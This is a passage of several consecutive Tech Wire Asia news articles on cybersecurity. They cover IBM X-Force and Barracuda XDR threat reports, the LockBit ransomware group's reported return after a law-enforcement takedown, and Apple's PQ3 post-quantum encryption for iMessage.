However, the advent of generative AI introduces new challenges and opportunities in both attacking and defending enterprise assets. As the AI capabilities of attackers evolve, we can expect their attacks to become faster, more precise, and scalable. Conversely, AI is also poised to boost the productivity of enterprise security, with its ability to quickly identify and prioritize threats like ransomware based on their signatures and behaviors—even if it’s a variant the system hasn’t encountered before.

Generative AI, with its capacity for self-learning, doesn’t require prior exposure to specific scenarios to detect new, sophisticated threats. This aspect makes it invaluable for cybersecurity, where it accelerates business processes by automating threat detection and investigation and adapts real-time organizational response strategies based on past incidents. It frees up security teams to tackle more complex and strategic security challenges.

The 2024 X-Force study suggests that as generative AI gains market dominance, it could also become a focal point for cybercriminals, encouraging further investment in tools designed for AI-engineered attacks. Despite the growing concern over such attacks, the primary security threat in the Asia Pacific region remains the exploitation of known, unpatched vulnerabilities.

Attention must also be directed towards protecting the region’s critical infrastructure and key sectors like manufacturing, finance, insurance, and transportation. This includes conducting stress tests and having a robust incident response plan ready.

With the increasing preference among global threat actors for exploiting user identities, there’s a pressing need for more effective user access control measures. This scenario underscores the importance of a comprehensive approach to security in the era of generative AI, highlighting the need for heightened vigilance and adaptation in cybersecurity strategies.

Strategic cybersecurity measures to prevent malicious cyber threats

Various strategies can mitigate cybersecurity threats, and it’s crucial to choose the one that best aligns with your specific needs or those of your business. While numerous AI solutions claim to offer protection against a wide array of cyber threats, the choice ultimately depends on what aligns best with your or your business’s specific needs. For instance, the IBM X-Force Threat Intelligence Index 2024 highlights insights and actionable recommendations for enhancing readiness and improving the speed and efficiency of response to cyberattacks.

One effective approach is to update identity management across multicloud environments. As cybercriminals increasingly exploit legitimate user accounts to gain access to networks—accounting for 30% of incidents responded to by X-Force in 2023—strengthening identity and access management (IAM) becomes crucial. Solutions like IBM Security Verify can bolster security in hybrid and multicloud setups by providing comprehensive IAM capabilities.

Beyond identity management, AI plays a critical role in optimizing cybersecurity resources. Tools such as IBM Security QRadar SIEM User Behavior Analytics (UBA) can aid in identifying compromised credentials and malicious activities, allowing teams to utilize their skills and time better. IBM Security QRadar EDR further enhances protection by securing endpoints and detecting unusual activities, such as data exfiltration or unauthorized account creation.

This pivot from ransomware to malware, particularly those targeting data theft, underscores the imperative of safeguarding data across hybrid cloud environments. This shift underscores the need for vigilant monitoring and robust data protection measures.

However, increasing security spending alone may not suffice. Embracing a zero-trust model and prioritizing trusted data can bolster your cybersecurity posture significantly. By fostering transparency and accountability, organizations can not only minimize risks but also actively prevent bias, making the zero-trust model and prioritization of trusted data essential strategies.

In light of these strategies, building trust and preparing for future threats become pivotal. A proactive security stance, grounded in careful partner selection and regular security reviews, complements the technical and strategic measures discussed. Building trust should be the foundation of every interaction, enhancing cyber-risk management and prioritizing cyber resilience to maintain and strengthen business relationships. This involves constantly monitoring and managing crucial points where trust is established or compromised.

Preparing for future threats requires a proactive security stance, including careful selection of partners and regular reviews of their security strategies and practices. This comprehensive approach to cybersecurity emphasizes the need for a balanced mix of technology, strategy, and a culture of trust and resilience.

As we prepare for future threats, a balanced mix of technology, strategy, and a culture of trust and resilience is crucial. The comprehensive approach discussed underscores the need for vigilance and adaptability in cybersecurity strategies to combat the evolving threat landscape effectively.

The post How vulnerable are we to cyber threats in the digital age? Here’s what IBM found appeared first on Tech Wire Asia.

Throughout 2023, Barracuda XDR and its dedicated SOC analysts sifted through nearly two trillion cybersecurity events. Their relentless scrutiny unveiled tens of thousands of potential high-risk security threats, safeguarding countless networks from intrusion.

A 2023 cybersecurity overview

The year’s analysis by security experts highlighted the predominant XDR threats. Their research unveiled the tactics attackers employed in their unsuccessful attempts to infiltrate networks. Techniques ranged from business email compromise to deploying malicious code and exploits, showcasing the diverse arsenal used by cybercriminals.

It’s crucial to understand that XDR and similar defensive security measures are designed to identify, alert, and thwart potential intruders preemptively. This proactive defense often stops attacks before their intended harm can be realized, leaving the ultimate goal of these thwarted attacks, such as deploying ransomware, unknown.

The trend in 2023 saw a noticeable uptick in high-severity attacks. Specifically, 66,000 threats warranted escalation to SOC analysts for further investigation, with an additional 15,000 posing immediate threats that required swift defensive actions. Notably, the frequency of such threats surged during the latter months of the year, especially from October through December, coinciding with peak online shopping periods and holiday seasons—when attackers likely see increased opportunities due to higher online activity and potentially reduced vigilance from IT staff.

NAVIGATING THE ETHICAL AI DILEMMA WITH BARRACUDA’S INSIGHT ON DUAL-USE TECHNOLOGIES

Muhammad Zulhusni | 27 October, 2023

Highlighting major cyberattack incidents

In one high-profile instance, HTC Global Services, a key IT and business consulting player, confirmed a cyberattack orchestrated by the ALPHV ransomware group, which began leaking sensitive data online. HTC Global Services, catering to industries like healthcare, automotive, manufacturing, and finance, promptly responded with a public acknowledgment via the social media platform X, emphasizing its commitment to resolving the issue and safeguarding user data integrity.

This cyberattack disclosure followed the ALPHV group’s public taunt, showcasing stolen data, including personal and sensitive information, and highlighting the tangible risks of such security breaches.

Similarly, Sony faced a ransomware dilemma with its Insomniac Games division, falling victim to a Rhysida ransomware attack. This incident led to a significant data breach, prompting Insomniac Games to alert employees about their compromised personal information.

Since its acquisition by Sony in August 2019, Insomniac Games has been a pivotal component of Sony Interactive Entertainment’s PlayStation Studios. It has been at the forefront of developing major titles like Marvel’s Spider-Man 2 for PlayStation 5 and is currently developing Marvel’s Wolverine.

Sony’s December announcement of an ongoing investigation into the breach by the Rhysida group underscored the severity of the attack, which resulted in over 1.3 million files being stolen. The refusal to meet the ransom demand led to the public leak of 1.67 TB of internal documents, profoundly impacting the studio’s team and revealing extensive personal and contractual information.

This leak, including previews of the upcoming Wolverine game, represents a significant violation of privacy and security, with Rhysida boasting about leaking 98% of the stolen data after allegedly selling the rest.

The analysis also highlighted a secondary peak in June, a prime holiday season for many, further underscoring the opportunistic nature of cyberattackers. These patterns, first identified in 2022, reaffirm the heightened risk during periods when potential victims are likely to be less vigilant, emphasizing the need for constant and robust cybersecurity measures.

High severity threats 2023. (Source – Barracuda).

The rise of identity compromise in cybersecurity

In 2023, the primary focus of XDR detections revolved around various forms of identity misuse, leading to compromised accounts. These detections highlighted activities such as unusual login patterns, brute force attacks, and attempts to disable multifactor authentication.

An alert for uploading a suspicious executable file might suggest that attackers are attempting to transfer additional malicious tools or malware from a controlled external source, like a command-and-control server, into a breached account.

Endpoint threat detections are initiated by Barracuda’s Managed XDR Endpoint Security whenever a potential threat is identified within a system. These critical alerts require immediate communication with the client for further investigation, regardless of whether the threat was successfully neutralized. This process is vital for determining how the malicious entity was initially executed.

The scope of these detections spans a broad range of threats, encompassing everything from benign to malicious entities, including potentially unwanted applications, adware, spyware, and more severe threats like ransomware and backdoors. Each type demands a specific strategy for identification and remediation.

Barracuda XDR uses AI and machine learning for enhanced detection capabilities, particularly in identifying suspicious login activities. These AI-driven rules analyze patterns and establish a user’s typical behavior, flagging any deviations for immediate review.

Suspicious login activity. (Source – Barracuda).

One such AI tool, the “Impossible Travel” detection rule, identifies logins from locations improbably far apart within a short time frame, indicating potential account compromise. For instance, Barracuda XDR recorded an example where a login occurred in Iowa, followed by another in Moscow just over an hour later, suggesting an impossible travel speed.

The “Rare User Log-in” detection rule aims to identify logins using unusual or inactive usernames, potentially signaling unauthorized access by an intruder exploiting dormant accounts or creating new ones for persistent access.

Similarly, the “Rare Hour for User” detection rule flags logins at atypical times for a user, which could indicate unauthorized access from different time zones or outside of normal working hours.

Barracuda XDR’s Intrusion Detection System (IDS) meticulously monitors network traffic, identifying suspicious activities and threats. This system is crucial for spotting both overt and subtle signs of cyberattacks, including malware distribution and other security breaches.

Analysis of top IDS detections in 2023 underscores a continuous trend of attackers exploiting unpatched vulnerabilities and weaknesses, emphasizing the importance of diligent network security updates.

Despite being decades old, Shellshock bugs remain a top detection, indicating that many systems are still vulnerable. Similarly, exploits against the Log4Shell vulnerability persist, likely due to the widespread integration of Log4j in software, making mitigation efforts challenging for many organizations.

Reflection on the 2023 cybersecurity strategy and future

Merium Khalid, director of SOC offensive security at Barracuda XDR, emphasizes the importance of understanding cyberattackers’ behaviors and strategies. Khalid observes, “Our data for 2023 shows that attackers are launching more high-severity attacks overall, and especially during times when IT teams are away from the workplace or less attentive, such as during holidays, outside working hours, during the night, and at weekends.”

Khalid further notes that a common goal among these attacks is to breach accounts through identity compromise. With attackers increasingly utilizing AI to enhance the volume, velocity, and complexity of their efforts, Khalid warns of an intensification of these trends. It’s imperative for security teams to arm themselves with equally advanced and effective security solutions.

To counteract these threats, Barracuda advocates for the adoption of stringent authentication and access management practices. This includes, at a minimum, the implementation of multifactor authentication, with a preference for transitioning towards zero trust architectures. Complementing this with diligent patch management, data security strategies, and regular cybersecurity education for all staff members is also advised.

Such measures should be part of a comprehensive security strategy that incorporates cutting-edge security technologies. This strategy should be supported by professional analysis and continuous security monitoring by a 24/7/365 SOC to detect and respond to any potential threats or anomalies that might otherwise go unnoticed.

2023 – a big year for big cyberattacks.

The post A year of high-severity attacks and groundbreaking cybersecurity strategies in 2023 appeared first on Tech Wire Asia.

Spoilers: the LockBit ransomware group is back. Despite several law enforcement agencies coming together to disrupt the ransomware group’s operations, there are now reports that the cybercriminal gang is back in action.

According to a report by Reuters, the ransomware group claims to have restored its servers and be back in business. The cybercriminal gang initially had its services disrupted by a joint operation from international law enforcement agencies which included the FBI, Europol and the UK’s National Crime Agency.

LAW ENFORCEMENT STRIKES BACK WITH REWARDS: THE FALL OF A MAJOR CYBERCRIME SYNDICATE, LOCKBIT

Muhammad Zulhusni | 23 February, 2024

The operation claimed to have taken over several key assets of the ransomware group, including sites and platforms they use to run their activities. Several members of the ransomware group were also arrested and indicted.

LockBit released a statement stating that law enforcement had hacked their dark web site using a vulnerability in the PHP programming language, which is widely used to build websites and online applications.

“All other servers with backup blogs that did not have PHP installed are unaffected and will continue to give out data stolen from the attacked companies,” said the statement, which was posted in English and Russian on a new version of Lockbit’s dark web site.

A spokesperson for Britain’s National Crime Agency, which led the international effort to seize Lockbit’s operations, told Reuters that the group “remains completely compromised.”

“We recognized LockBit would likely attempt to regroup and rebuild its systems. However, we have gathered a huge amount of intelligence about it and those associated with it, and our work to target and disrupt them continues,” the spokesperson said.

The Guardian reported that the US charged two Russian nationals with deploying LockBit ransomware against companies and groups around the world. Police in Poland also made an arrest, and in Ukraine, police arrested a father and son they said carried out attacks using LockBit’s malicious software.

The ransomware group also posted on its new site that it plans to attack US government sites more often. Its revamped website, launched on Saturday, showed a number of purported hacking victims.

The LockBit ransomware group threatened to launch more cyberattacks on the US.

Preparing for a LockBit ransomware group retaliation

Tech Wire Asia caught up with Christopher Budd, director for Sophos X-Ops on the latest updates. Budd shared his views on the recent takedown of LockBit’s site and the need for businesses to be even more prepared to deal with retaliation from the ransomware group.

“Following word that LockBit’s website may be back up and running, it’s important to note another risk that groups like LockBit pose. Even if a ‘take down’ is 100% effective at nabbing all the members of LockBit, its infrastructure and malware, it won’t stop the malware that’s already in the wild and now outside of that group’s control.

FBI AND UK CRIME AGENCY FINALLY DISRUPT LOCKBIT CYBER-GANG

Aaron Raj | 21 February, 2024

“New Sophos X-Ops threat intelligence on exploitation attacks of ScreenConnect vulnerabilities highlights this very real threat. Malware in these attacks was built using the LockBit 3 ransomware builder tool that was leaked in 2022, meaning the malware used in these attacks may not have originated with the actual LockBit developers. Because of that leak, there is malware out there being used in attacks that are outside of the control of the LockBit group.

“This underscores another, often overlooked way in which these criminal groups threaten everyone: their offensive capabilities become part of the broader threat environment, subject to no one’s control. You can be threatened and attacked by the malware developed by a group like LockBit without being threatened and attacked by the group directly,” commented Budd.

Sophos X-Ops has been tracking the evolution of LockBit over the past four and a half years. According to an analysis by the Sophos X-Ops Incident Response team, LockBit has been among the top 10 most reported ransomware infections since 2020; with the demise of Conti in early 2022, LockBit vaulted to the top of the charts. It ultimately accounted for one in five of all ransomware infections seen by Sophos’s IR in 2023 – comparable in ubiquity in that data to Conti at its peak.  

A handout picture released by Britain’s National Crime Agency (NCA) in London on February 20, 2024 shows a screenshot of the seized cybercrime group ‘LockBit’ site.  (Photo by NATIONAL CRIME AGENCY/AFP).

Meanwhile, Dean Houari, director of security technology and strategy at Akamai, pointed out that ransomware gangs are nimble and a variant of the LockBit gang could fill the void and soon take over with even more damaging tools.

“The most effective security strategy is to prevent attackers from accessing and encrypting the data on critical servers and have a backup in the event they are able to breach an environment. Now is the time for organizations to reassess the state of their security postures. A thorough understanding of attack surfaces, along with strong processes and playbooks to prevent and recover from ransomware attacks are essential,” said Houari.

Houari also explained that implementing a zero-trust architecture starting with software-defined micro-segmentation to prevent lateral movement post-breach is critical.

“Full network visibility to identify indicators of compromise (IoCs) will enable a more offensive posture against ransomware attacks and allow compliance with local cybersecurity regulations,” he added.

The post Is the LockBit ransomware group back? appeared first on Tech Wire Asia.

In an era where digital privacy is paramount, Apple is integrating PQ3 into iMessage. This announcement marks a watershed moment in messaging security, propelling iMessage to unprecedented heights of protection. As the first widely deployed messaging app to achieve Level 3 security, what does the announcement mean for iPhone users, and why should they care?

NO IMESSAGE ON ANDROID: APPLE BLOCKS THIRD-PARTY APP

Aaron Raj | 12 December, 2023

At the heart of Apple’s PQ3 integration lies a revolutionary cryptographic protocol designed to withstand the challenges posed by quantum computing. Unlike traditional encryption methods, which may be vulnerable to future quantum attacks, PQ3 provides robust protection against even the most sophisticated adversaries. Using advanced cryptographic techniques, PQ3 ensures that iMessage conversations remain secure and private, regardless of the evolving threat landscape.

“To our knowledge, PQ3 has the strongest security properties of any at-scale messaging protocol in the world,” Apple’s Security Engineering and Architecture (SEAR) team stated in a blog post a week ago.

The new state of the art in quantum-secure messaging at scale. Source: Apple.

A quantum leap in messaging security

Traditionally, messaging platforms rely on classical public key cryptography like RSA, elliptic curve signatures, and Diffie-Hellman key exchange for secure end-to-end encryption. These algorithms are based on complex mathematical problems deemed computationally intensive for conventional computers, even with Moore’s law in play. However, the advent of quantum computing poses a new challenge.

A powerful enough quantum computer could solve these mathematical problems in novel ways, potentially jeopardizing the security of end-to-end encrypted communications. While quantum computers capable of decryption aren’t yet available, well-funded attackers can prepare by exploiting cheaper data storage. They accumulate encrypted data now, planning to decrypt it later with future quantum technology—a tactic termed “harvest now, decrypt later.”

When iMessage launched in 2011, it became the first widely available messaging app with default end-to-end encryption. Over the years, Apple has continually enhanced its security features. In 2019, the iPhone maker bolstered its cryptographic protocol by transitioning from RSA to elliptic curve cryptography (ECC) and safeguarding encryption keys within the secure enclave, increasing protection against sophisticated attacks. 

“Additionally, we implemented a periodic rekey mechanism for cryptographic self-healing in case of key compromise. These advancements underwent rigorous formal verification, ensuring the robustness of our security measures,” the blog post reads. The cryptographic community has been developing post-quantum cryptography (PQC) to address the threat of future quantum computers. These new public key algorithms can run on today’s classical computers without requiring quantum technology. 

Designing PQ3

Designing PQ3 involved rebuilding the iMessage cryptographic protocol to enhance end-to-end encryption, meeting specific goals:

1. Post-quantum cryptography: PQ3 protects all communication from current and future adversaries by introducing post-quantum cryptography from the start of a conversation.
2. Mitigating key compromises: It limits the impact of critical compromises by restricting the decryption of past and future messages with a single compromised key.
3. Hybrid design: PQ3 combines new post-quantum algorithms with current elliptic curve algorithms, ensuring increased security without compromising protocol safety.
4. Amortized message size: To minimize additional overhead, PQ3 spreads message size evenly, avoiding excessive burdens from added security.
5. Formal verification: PQ3 undergoes standard verification methods to ensure robust security assurances.

According to Apple, PQ3 introduces a new post-quantum encryption key during iMessage registration, using Kyber post-quantum public keys. These keys facilitate the initial critical establishment, enabling sender devices to generate post-quantum encryption keys for the first message, even if the receiver is offline.

Furthermore, PQ3 implements a periodic post-quantum rekeying mechanism within conversations to self-heal from crucial compromise and protect future messages. This mechanism creates fresh message encryption keys, preventing adversaries from computing them from past keys.

The protocol utilizes a hybrid design, combining elliptic curve cryptography with post-quantum encryption during initial critical establishment and rekeying. Rekeying involves transmitting fresh public key material in line with encrypted messages, with the frequency of rekeying balanced to preserve user experience and server infrastructure capacity.

PQ3 continues to rely on classical cryptographic algorithms for sender authentication and essential verification to thwart potential quantum computer attacks. These attacks require contemporaneous access to a quantum computer and cannot be performed retroactively. But Apple noted that future assessments will evaluate the need for post-quantum authentication as quantum computing threats evolve.

A man uses an Apple iPhone in Beijing on September 12, 2023. (Photo by Pedro PARDO/AFP).

Why PQ3 on iMessage matters for iPhone Users

Integrating PQ3 into iMessage signifies a huge leap forward in privacy and security for iPhone users. With the exponential growth of data and the looming specter of quantum computing, traditional encryption methods face unprecedented challenges. PQ3 mitigates these risks by providing quantum-resistant protection, ensuring that your conversations remain shielded from future threats. 

PQ3’s implementation in iMessage demonstrates Apple’s interest in safeguarding user privacy and staying ahead of emerging security threats. Beyond its robust encryption capabilities, PQ3 introduces a host of additional security features designed to enhance the overall integrity of iMessage. These include secure fundamental establishment mechanisms, cryptographic self-healing protocols, and real-time threat detection capabilities. 

By incorporating these advanced security measures, Apple hopes to ensure that iMessage remains a bastion of privacy in an increasingly interconnected world.

When can iPhone users expect the update?

Support for PQ3 will begin with the public releases of iOS 17.4, iPadOS 17.4, macOS 14.4, and watchOS 10.4. Already available in developer previews and beta releases, PQ3 will automatically elevate the security of iMessage conversations between devices that support the protocol. As Apple gains operational experience with PQ3 globally, it will gradually replace the existing protocol within all sustained conversations throughout the year.

The post Apple adds PQ3 protocol into iMessage appeared first on Tech Wire Asia.